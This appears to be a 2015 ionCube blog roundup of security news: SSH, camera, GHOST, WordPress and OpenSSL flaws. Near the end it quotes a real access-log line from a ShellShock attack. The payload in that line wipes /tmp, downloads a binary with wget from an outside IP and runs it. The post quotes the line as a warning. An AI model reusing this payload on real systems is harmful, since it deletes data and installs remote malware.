Weekly Cyber Security News

For well over a decade our focus at ionCube has been on PHP security but recently with the release of ionCube24 we have been looking into different kinds of vulnerabilities. This post has a few of the interesting issues we have found this week.

Another SSH issue!

• CVE-2015-1782 (libssh2)

Web attached cameras seem to pop up on a regular basis – if you have *any* cam always put a bit of extra protection in front of it. You just never know!

• D-Link Patches Flaws in IP Cameras, Wireless Range Extenders –

GHOST continues to be a problem

• Exim GHOST (glibc gethostbyname) Buffer Overflow – Topic: Exim GHOST (glibc gethostbyname) Buffer Overflow Risk: High Text:## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-f…

Not everything appears safe at first glance!

• MSA-2015-03: iPass Mobile Client Service Local Privilege Escalation

This vulnerability affects WordPress and is something that ionCube24 can protect against.

• Inverted WordPress Trojan

And a leak can cost you more than just money.

• Premera Blue Cross is sick after hackers plunder their servers

How *not* to handle a security disclosure

• Re: MSA-2015-03: iPass Mobile Client Service Local Privilege Escalation

A bit of a nasty WordPress one.

• SQL Injection Vulnerability in All In One WP Security & Firewall plugin before 3.8.8 for WordPress

A leak can be very costly!

• Target tosses US$10 million at victims of breach

This old piece of code has had a few disclosures recently

• The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the

Some OpenSSL issues this week

• Upcoming new OpenSSL version with _high severity_ security issues –

Even those with a focus on security can also be caught out!

• [SE-2014-02] Google App Engine Java security sandbox bypasses (details)

One of our own weblogs recently had a sobering reminder of the ShellShock bug from last year, which had been a critical vulnerability in the Open Source Unix BASH shell for 25 years.

[pastacode lang=”php” message=”” highlight=”” provider=”manual”]

222.186.21.115 - - [16/Mar/2015:12:47:14 +0000] "GET / HTTP/1.1" 403 4874 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;ec\
ho wget http://222.186.21.115:999/udso -O /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;ec\
ho chmod 777 /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >\
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.\
21.115:999/udso -O /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China\
.Z-aoii\xb8 >> /tmp/Run.sh;echo /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777\
 /tmp/Run.sh;/tmp/Run.sh\""

[/pastacode]

 

These are just a few examples of the vulnerabilities found this week and the list is continually growing. Be sure to stay updated and give yourself as much protection as possible from these cyber threats.